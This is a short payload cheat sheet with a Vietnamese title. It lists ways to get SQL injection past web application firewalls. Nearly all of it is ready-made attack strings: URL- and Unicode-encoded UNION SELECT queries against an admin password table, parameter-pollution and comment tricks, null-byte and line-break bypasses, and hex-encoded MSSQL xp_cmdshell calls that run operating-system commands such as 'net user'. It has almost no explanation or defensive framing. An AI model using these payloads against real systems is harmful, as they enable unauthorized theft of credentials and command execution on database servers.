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[SQL injection] Một vài kỹ thuật bypass waf
- URL encode
original payload: ?id=1 union select pass from admin limit 1
encode pyaload: id=1%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%70% 61%73%73%20%66%72%6f%6d%20%61%64%6d%69%6e%20%6c%69 %6d%69%74%20%31 - Unicode encode
original payload: ?id=1 union select pass from admin limit 1
encode pyaload: ?id=1 un%u0069on sel%u0065ct pass f%u0072om admin li%u006dit 1 - Http parameter contamination/complex parameter bypass
?id=%28-575%29UNION%20%28SELECT%201,username,3,4,passwd,6, 7,8,9,10,11,12,13,14,15,16,17,18&id=19%20from%28ad min%29%29
?id=1&id=1/**/And/**/1=2/**/Union/**/Select/**/1,concat%28database%28%29,0x3a,user%28%29,0x3a,ver sion%28%29%29,3
?id=1 union select 1&id=pass from admin - Special character contamination bypass
//%00 equivalent to NULL, null characters cut it, WAF parse url parameters in the time being cut off
replace spaces with /**/ And replaced with a %n%d, ;[NULL] ;%00 ;x00, ||…. - Search engine whitelist bypass, agent proxy bypass
- Method bypass
Change GET to POST, POST to GET …
GET /id=1 union select 1,2,3,4
POST id=1 union select 1,2,3,4 - Encoding Bypass (urlencoded/from-data)
- The keyword split bypass
?id=1;EXEC(‘ma’+’ster..x’+’p_cm’+’dsh’+’ell “net user”‘) - Database special syntax bypass
?id=1.union%0aselect@1,2 ,!3,4 - Use the comment statement to bypass
UNION /**/ Select /**/user,pwd,from tbluser - HEX bypass
0x730079007300610064006D0069006E00 =hex(sysadmin)
0x640062005F006F0077006E0065007200 =hex(db_owner)
?id=1;declare%20@a%20sysname%20select @a=0x6e006500740020007500730065007200200061006e006 70065006c002000700061007300730020002f0061006400640 0 exec master.dbo.xp_cmdshell @a;– - GET Parameter SQL Injection %0A Line Break Pollution Bypass
?id=-11%0Aunion%0Aselect 1,2,3,4